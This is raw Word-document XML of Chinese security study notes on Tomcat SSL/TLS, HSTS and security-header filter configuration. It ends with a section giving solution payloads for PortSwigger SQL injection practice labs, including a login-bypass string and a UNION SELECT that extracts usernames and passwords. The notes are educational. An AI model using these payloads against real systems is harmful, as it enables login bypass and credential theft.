                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;Connector port="8080" protocol="HTTP/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E5495A" w14:textId="77777777" w:rsidR="00B81243" w:rsidRPr="002E0C05" w:rsidRDefault="00B81243" w:rsidP="00B81243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0C05">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體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 connectionTimeout="20000"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D20566C" w14:textId="1E3BF683" w:rsidR="00B81243" w:rsidRPr="00B81243" w:rsidRDefault="00B81243" w:rsidP="00B81243">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="002E0C05">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體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 redirectPort="8443" /&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B81243">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00336165">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>--&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D313A39" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRDefault="00F34DEC" w:rsidP="0026491E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</w:tbl>
    <w:p w14:paraId="1AB437C2" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="0026491E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469355D1" w14:textId="1F811390" w:rsidR="00B44A4B" w:rsidRPr="00B44A4B" w:rsidRDefault="00B44A4B" w:rsidP="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262DB0">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hstsIncludeSubDomains</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：設定為 true 表示 HSTS 政策適用於該域名下的所有子域。如果你確定所有子域都有正確的 HTTPS 配置，那麼這是一個好的設定。但如果有任何子域沒有 HTTPS 或設定不正確，那麼該設定可能會導致這些子域無法訪問。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C65D684" w14:textId="2B670DBA" w:rsidR="00B44A4B" w:rsidRDefault="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7913779B" w14:textId="77777777" w:rsidR="00B3059D" w:rsidRDefault="00B3059D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"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</w:p>
    <w:p w14:paraId="5BB2A7ED" w14:textId="25CEC0EF" w:rsidR="00925D37" w:rsidRPr="00DC0584" w:rsidRDefault="00CB180D" w:rsidP="00925D37">
      <w:pPr>
        <w:pStyle w:val="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2</w:t>
      </w:r>
      <w:r w:rsidR="006D4CE3">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">設定 </w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-mapping&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00216E6A">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00925D37" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>conf/web.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86568A" w14:textId="77777777" w:rsidR="00925D37" w:rsidRPr="00DC0584" w:rsidRDefault="00925D37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620DD602" w14:textId="74022CBD" w:rsidR="0098676C" w:rsidRPr="00B96FF5" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t>約在 6</w:t>
      </w:r>
      <w:r w:rsidR="00134608">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行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3F73E78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FE0B" w14:textId="01D2BCFB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>&lt;filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4439B460" w14:textId="532DD506" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="003D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&lt;filter-name&gt;httpHeaderSecurity&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C9B28B" w14:textId="5C503257" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="003D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&lt;url-pattern&gt;/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D37F5F" w14:textId="2E2CA962" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="003D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="007247F3" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64CA4989" w14:textId="026ACDB3" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0072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</w:rPr>
              <w:t>&lt;/filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C853ECA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7EC6C00B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 xml:space="preserve">REQUEST: 表示只有在當前的請求中執行過濾器。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C25F15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 xml:space="preserve">FORWARD: 表示在對請求進行轉發時執行過濾器。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6707D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 xml:space="preserve">INCLUDE: 表示在對請求進行包含時執行過濾器。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6264D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>ERROR: 表示當出現錯誤時執行過濾器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D884F55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2158575B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>補充：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C120D" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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>REQUEST 與 FORWARD 要透過 httpHeaderSecurity 來過濾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2BF493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6E51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&lt;filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FADDAFE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&lt;filter-name&gt;httpHeaderSecurity&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB6F346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&lt;url-pattern&gt;/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649FBCB0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&lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F169A4E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&lt;/filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012A9189" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C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</w:p>
          <w:p w14:paraId="591DD729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&lt;filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D4280B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&lt;filter-name&gt;httpHeaderSecurity&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1125BC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&lt;url-pattern&gt;/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E15AD0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lang w:val="en-US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    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A65BC4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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
              </w:rPr>
              <w:t>&lt;/filter-mapping&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60D27AB6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05BA85AB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 xml:space="preserve">因為 conf/web.xml 已經配置 httpHeaderSecurity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA693A9" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr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 w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t>所以網站個別的 web.xml &lt;security-constraint&gt; 就可以不用配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147BB07C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1DD327C6" w14:textId="77777777" w:rsidR="00143791" w:rsidRDefault="00143791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</w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C555AA" w14:textId="6339071F" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PortSwigger 攻擊養成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8676C" w:rsidRPr="00DC0584" w14:paraId="690EFF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2CF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SQL injection Lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DED707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68FF9D27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  <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18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  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://portswigger.net/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="313CD5E8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05E6FEF9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Gungsuh"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>請先註冊</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D05A32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1920EB6F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所有練習 Lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF4CECD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19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https://portswigger.net/web-security/all-labs</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="30AE6145" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676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2CD662E4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攻擊練習 Lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379CA1F7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SQL injection、Cross-site scripting、Cross-site request forgery (CSRF)、Clickjacking、DOM-based vulnerabilities、Cross-origin resource sharing (CORS)、XML external entity (XXE) injection、Server-side request forgery (SSRF)、HTTP request smuggling、OS command injection、Server-side template injection、Directory traversal、Access control vulnerabilities、Authentication、WebSockets、Web cache poisoning、Insecure deserialization、Information disclosure、Business logic vulnerabilities、HTTP Host header attacks、OAuth authentication、File upload vulnerabilities、JWT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EFE521B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2440B5DD" w14:textId="661AF54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618DA98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找出隱藏數據</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12ADED3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Lab 1 : SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35717DBE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0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https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5DF1AF0C" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C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14:paraId="1BD5551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Sol: :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622D7B17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'+or+1=1+--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D7FC3F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49F4BD06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登入攻擊</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D047B9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Lab 2 : SQL injection vulnerability allowing login bypass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4006966A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1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https://portswigger.net/web-security/sql-injection/lab-login-bypass</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="57C547AF" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C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</w:p>
          <w:p w14:paraId="465BE2FC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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sol:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E1FB24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333332"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white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color w:val="333332"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>administrator'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3107AB6F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0E48800B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0E64DAC0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  <w:t xml:space="preserve">UNION </w:t>
            </w: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攻擊</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E28A66E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  <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId22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  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/sql-injection/union-attacks</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0885AA06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0AD8566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確定SQL注入UNION攻擊所需的列數</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2877D6C2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Lab 3 : SQL injection UNION attack, determining the number of columns returned by the query</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18769770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3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https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="189C57B1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40DCD706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確認欄位型態</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7331E41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Lab 4 : SQL injection UNION attack, finding a column containing text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C07F0D7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4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https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="37AF41A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5976331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Sol:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26935652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'+UNION+SELECT+NULL,'ukvlPn',NULL--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D63548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66AE25C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跨表搜尋</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41ECAE7E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>Lab 5 : SQL injection UNION attack, retrieving data from other tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEEF822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5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https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7DB1FA74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Sol:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE226A2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'+UNION+SELECT+NULL,NULL--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F0DD4F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'+UNION+SELECT+'a','b'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6066EBF9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 SELECT username, password FROM users--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6777AC36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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75167E0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在單個列中檢索多個值</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AED3697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Lab6 : SQL injection UNION attack, retrieving multiple values in a single </w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>column</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795448A5" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0038465F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color w:val="1155CC"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId26">
              <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
                <w:rPr>
                  <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Times New Roman"/>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3173E3A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</w:p>
          <w:p w14:paraId="45F0F49A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Sol:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E4929C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'+UNION+SELECT+NULL,NULL--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D93C45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'+UNION+SELECT+NULL,'abc'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E9F57C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</w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'+UNION+SELECT+NULL,username||'~'||password+from+users--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087B8EC3" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3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C0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>最後再隨便找一個 username/password 登入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="184BD9FA" w14:textId="3FD6C5CA" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
            <w:pPr>
              <w:widowControl w:val="0"/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14:paraId="30F60448" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098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</w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F739D45" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11656D89" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0098676C" w:rsidRPr="00DC0584">
      <w:headerReference w:type="default" r:id="rId27"/>
      <w:footerReference w:type="even" r:id="rId28"/>
      <w:foot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2E14" w14:textId="77777777" w:rsidR="0038465F" w:rsidRDefault="0038465F" w:rsidP="002873F7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57CCE941" w14:textId="77777777" w:rsidR="0038465F" w:rsidRDefault="0038465F" w:rsidP="00287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1358885584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14:paraId="6480F0E8" w14:textId="3CB06E36" w:rsidR="00083371" w:rsidRDefault="00083371" w:rsidP="005B6B1F">
        <w:pPr>
          <w:pStyle w:val="afe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sdt>
    <w:sdtPr>
      <w:rPr>
        <w:rStyle w:val="aff0"/>
      </w:rPr>
      <w:id w:val="660819461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14:paraId="0B2493EE" w14:textId="15594DAD" w:rsidR="00B70DE4" w:rsidRDefault="00B70DE4" w:rsidP="005B6B1F">
        <w:pPr>
          <w:pStyle w:val="afe"/>
          <w:framePr w:wrap="none" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right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60BB73F3" w14:textId="77777777" w:rsidR="002873F7" w:rsidRDefault="002873F7" w:rsidP="00B70DE4">
    <w:pPr>
      <w:pStyle w:val="af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1625384049"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:rStyle w:val="aff0"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="368D8461" w14:textId="3CE678DB" w:rsidR="00B70DE4" w:rsidRDefault="00B70DE4" w:rsidP="00083371">
        <w:pPr>
          <w:pStyle w:val="afe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separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="aff0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="aff0"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="71A47E3D" w14:textId="77777777" w:rsidR="002873F7" w:rsidRDefault="002873F7" w:rsidP="00B70DE4">
    <w:pPr>
      <w:pStyle w:val="af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DC5A" w14:textId="77777777" w:rsidR="0038465F" w:rsidRDefault="0038465F" w:rsidP="002873F7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="572A3268" w14:textId="77777777" w:rsidR="0038465F" w:rsidRDefault="0038465F" w:rsidP="00287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6E75" w14:textId="5E976313" w:rsidR="002873F7" w:rsidRPr="002873F7" w:rsidRDefault="002873F7" w:rsidP="002873F7">
    <w:pPr>
      <w:pStyle w:val="afc"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002873F7">
      <w:rPr>
        <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">資訊安全筆記 </w:t>
    </w:r>
    <w:r w:rsidRPr="002873F7">
      <w:rPr>
        <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:t>SSL/TSL 設定教學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AD7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD066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2C409D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A2431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64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536244"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D407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E76984"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78640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0620F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF68D5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451264"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="735AA3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13725C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E39675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FF1D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA3ABE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D24AD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="078CE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A3470D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="248C9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097BE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="239434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3A4918"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B09E3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276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435C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DB62685"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED7AF7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E754B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="341460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16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="15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C"/>
